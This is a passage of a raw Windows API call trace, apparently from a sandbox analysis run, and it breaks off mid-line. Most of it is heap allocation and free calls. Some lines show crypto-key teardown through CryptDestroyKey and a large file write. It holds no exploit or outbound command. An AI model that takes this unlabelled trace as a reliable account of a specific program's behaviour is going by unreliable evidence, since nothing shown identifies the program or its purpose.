hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0256.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f37b80 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea2e90 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25dc8 | out: hHeap=0x970000) returned 1 [0256.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0256.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0256.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2e7f320 [0256.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb4c48 | out: hHeap=0x970000) returned 1 [0256.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0256.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0256.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0256.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11db0) returned 0x2f14010 [0256.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.720] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x11db0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x11db0, lpOverlapped=0x0) returned 1 [0256.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.726] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0256.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0256.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0256.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0256.727] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0256.727] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0256.727] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.728] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 1 [0256.798] TranslateMessage (lpMsg=0x8cedb0) returned 0 [0256.798] DispatchMessageW (lpMsg=0x8cedb0) returned 0x0 [0256.798] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0256.798] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.798] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0256.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0256.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.799] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0256.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0256.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0256.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.800] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.801] CryptDestroyKey (hKey=0xa874d0) returned 1 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0256.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.802] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0256.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.803] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0256.803] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.803] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0256.803] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51478 [0256.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.803] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0256.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: 